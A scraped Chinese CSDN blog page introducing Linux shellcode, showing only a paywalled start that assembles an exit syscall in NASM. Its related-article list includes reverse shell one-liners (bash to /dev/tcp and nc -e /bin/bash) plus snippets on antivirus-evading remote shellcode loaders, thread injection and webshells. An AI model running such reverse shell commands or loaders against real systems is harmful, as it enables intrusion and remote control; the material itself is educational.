Linux ShellCode远程攻击原理

最新推荐文章于 2023-02-21 00:00:00 发布
最新推荐文章于 2023-02-21 00:00:00 发布
阅读量1.9k 收藏
点赞数
分类专栏: GNU/Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/X_White/article/details/8619885
版权
这里就以exit 系统调用为例首先编写C代码,在GDB中使用 disass _exit 反汇编exit 函数,之后迁移为汇编代码。section .textglobal _start_start:xor eax, eaxxor ebx, ebxmov al, 0x01int 0x80之后只用如下nasm 进行汇编, ld 进行连接,生成可执行文件nasm -f elf
摘要由CSDN通过智能技术生成

这里就以exit 系统调用为例

首先编写C代码,在GDB中使用 disass _exit 反汇编exit 函数,之后迁移为汇编代码。

section .text
global _start
_start:
xor eax, eax
xor ebx, ebx
mov al, 0x01
int 0x80

之后只用如下nasm 进行汇编, ld 进行连接,生成可执行文件 
nasm -f elf exit.asm
ld exit.o -o exit
exit
中间可能由于系统问题导致如下问题: 

[root@localhost home]# ld exit.o -o exit.
ld: i386 architecture of input file `exit.o' is incompatible with i386:x86-64 output

这里详见nasm 参数列表 nasm -hf 

    elf32     ELF32 (i386) object files (e.g. Linux)
    elf       ELF (short name for ELF32)
    elf64     ELF64 (x86_64) object files (e.g. Linux)
然后用elf64即可,这里需要和你的系统相匹配,具体可以用uname -a 查看 

[root@localhost home]# nasm -
最低0.47元/天 解锁文章
X-Wyatt
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
免杀专题(一)shellcode原理
weixin_47224111的博客
12-30 3811
免杀专题(一)shellcode原理 基本概念 一段16进制的机器码,可在暂存器eip溢出后,塞入一段可让cpu执行的shellcode机器码,让电脑可以执行攻击者的任意指令。 原理 因为shellcode一般为一段汇编代码,不依赖任何编译环境,也不能像编写代码一样,调用api函数名称来实现功能。它通过主动查找dll基址并动态获取api地址的方式来实现api调用。 Kernel32.dll控制着系统的内存管理、数据的输入输出操作和中断处理。 shellcode分为两个模块,基本模块和功能模块 基本模块 用
Shellcode攻击实验
Atlas2013的专栏
10-18 3635
首先,先要知道什么是shellcodeShellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。详见维基百科shellcode介绍:http://en.wikipedia.org/wiki/Shellcode
Shellcode原理及编写
热门推荐
maotoula的专栏
01-19 6万+
1.shellcode原理
远程执行shellcode
aod83029的博客
06-13 472
#include "Windows.h" #include <WinSock2.h> #include <stdio.h> #pragma comment(lib,"WS2_32.lib") int shellcode_execute() { WSADATA wsData; if(WSAStartup...
C/C++ 远程ShellCode执行工具
CSDN
07-21 1万+
通过开发一组远程代码执行盒,可以动态实现对ShellCode代码的动态载入,由于ShellCode不存放在本地客户端常量区,所以在一定程度上可以减少被杀概率,客户端只保留之基本的Socket通信功能,当需要时才会加载恶意代码运行。此工具分为服务端与客户端,客户端可以将其加入到开机自启动列表,并传入响应的参数即可,目前支持TCP/UDP/HTTP三种协议传输,后期可能会增加ICMP等来实现后门的传输工作。
selinux攻击shellcode
05-22
该漏洞允许远程攻击者通过精心构造的请求触发缓冲区溢出,从而可能执行任意代码,即shellcode。这个漏洞是由于在处理某些类型的内容编码时,Apache的mod_deflate模块存在边界检查错误。 **当讨论SELinuxshellcode...
linuxshellcode编写手册
05-18
### LinuxShellcode编写手册概览及核心知识点 #### 一、基础知识介绍 **1.1 基本概念** - **内存管理**: 计算机中的内存是按需分配和管理的。对于程序员而言,了解内存的工作原理非常重要,尤其是在低级别的...
远程缓冲区溢出攻击及防护 (2010年)
05-14
介绍了 Linux系统下缓冲区溢出的原理shellcode具体实现方法。阐述了远程 shellcode从 C代码到机器码的编写过程,并从成功率角度对攻击方法进行了分析。利用 red hat 9.0上的漏洞程序对 shellcode进行了测试。对...
linux内核exploit.rar
08-14
对于本地exploit,可能需要利用栈溢出或堆溢出等技巧,改变返回地址,执行攻击者准备好的shellcode远程exploit可能需要考虑如何绕过ASLR(地址空间布局随机化)和DEP(数据执行防护)等安全机制。 在exploit开发...
溢出攻击技术教程下载
09-26
对于Win32平台,栈溢出攻击原理Linux相似,但具体的实现细节有所不同。Win32 API提供了丰富的功能,使得在Windows系统上执行Shellcode变得更加复杂。此外,Windows的保护机制,如DEP(Data Execution Prevention...
基于Linux远程控制shell方式的原理与实现.pdf
09-06
基于Linux远程控制shell方式的原理与实现.pdf
linuxshell编程技术原理
03-06
这是《linux0.01内核分析与操作系统设计》的第10章部分源代码,所有代码已在ubuntu上成功编译,对于学习linuxshell编程还是很有意思的, 内容涉及到了文件操作,管道,重定向等。对于C语言的学习很有帮助。
远程线程shellcode注入
ndl1302732的专栏
10-11 2252
高手请飘过~~~~~~~~~~~~~~~~~~~~~~~~~~~          前一篇文章,写到了利用远程线程注入DLL,其原理是利用LoadLibaray把DLL加载进去,这种方式注入简单,但是会在对方进程加载一个模块。人家用工具一看,多了个模块,就知道被搞了。。。           今天写下用远程线程注入shellcode, 注入shellcode的难点是,注入的代码不能访问绝对地址...
linux+反弹shell原理,linux反弹shell原理详解
weixin_39778582的博客
05-13 246
完整命令反弹shell命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1bash -i > /dev/tcp/ip/port 0>&1 2>&1利用nc反弹shell:nc -lvvp 12345 -t -e /bin/bash原理bash -i > /dev/tcp/ip/port 0>&a...
《网络攻击与防御》 Linux攻击实验(4)
CSDNfengwang的博客
02-21 617
理解Linux操作系统的安全体系结构与机制,掌握Linux远程安全攻防技术,掌握Linux操作系统网络服务漏洞攻击过程,并学习如何利用metasploit对Linux操作系统进行简单的攻击及提权。远程获取Metasploitable2-Linux的shadow文件和passwd文件内容;使用generic/shell_reverse_tcp的PAYLOAD来连接远程主机;远程获取Metasploitable2-Linux的root帐户权限;/etc/shadow:储存了系统中的各个用户的密码信息。
利用缓存区漏洞执行shellcode
qq_38919714的博客
02-03 1747
环境:win10 工具:vc++6 原理介绍:  栈溢出,C语言中gets()、strcpy()等函数未进行数据长度的限定,在栈内写入超出长度限制的数据,从而破坏程序运行甚至获得系统控制权的攻击手段。几个常见的寄存器,ebp栈底指针,esp栈顶指针,eip下一条计算机执行的指令,计算机中真正的存储方式如下图:   原理介绍:eip寄存器里存储的是CPU下次要执行的指令的地址。eip在内
shell原理
qq_28576837的博客
06-23 1110
shell原理
webshell利用原理
Jeromeyoung
03-03 8134
WebShell,顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。黑客在入侵了一个网站后,通常会将这些asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问这些asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的(可以上传下载文件,查看数据库,执行任意程序命令等)。由于web...
ShellCode的另外一种玩法(远程线程注入ShellCode)[by Anskya]
04-06 2213
 [原创]ShellCode的另外一种玩法(远程线程注入ShellCode)介于小弟技术菜,请各位大哥不要"奸笑"希望可以指点一二转载请保留版权:by Anskya这里是说将ShellCode代码直接注射到远程进程内部使她运行!以下代码全部使用TASM为原型编写(MASM不太适合,不能自定义PE结构,为了某某人说我抄袭和盗版pkXX大哥的FASM大作,我这里就使用国内很少用的TASM为原型
shellcode植入的原理和覆盖邻接变量攻击原理
最新发布
06-11
Shellcode植入是一种利用漏洞将恶意代码注入到目标机器内存中并执行的技术。它的原理是利用程序中存在的漏洞,将恶意代码注入到程序的内存中,并通过改变程序的控制流使其执行恶意代码。通常,Shellcode会利用缓冲区溢出漏洞或格式化字符串漏洞等来实现注入。 覆盖邻接变量攻击则是一种利用缓冲区溢出漏洞的攻击方法。它的原理是在程序中寻找一个可控的缓冲区,并向其中输入比缓冲区长度更长的数据,导致数据溢出并覆盖掉邻接的变量,从而改变程序的执行流程。攻击者可以通过覆盖邻接变量来修改程序的内存数据,执行任意代码或者拒绝服务等攻击
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值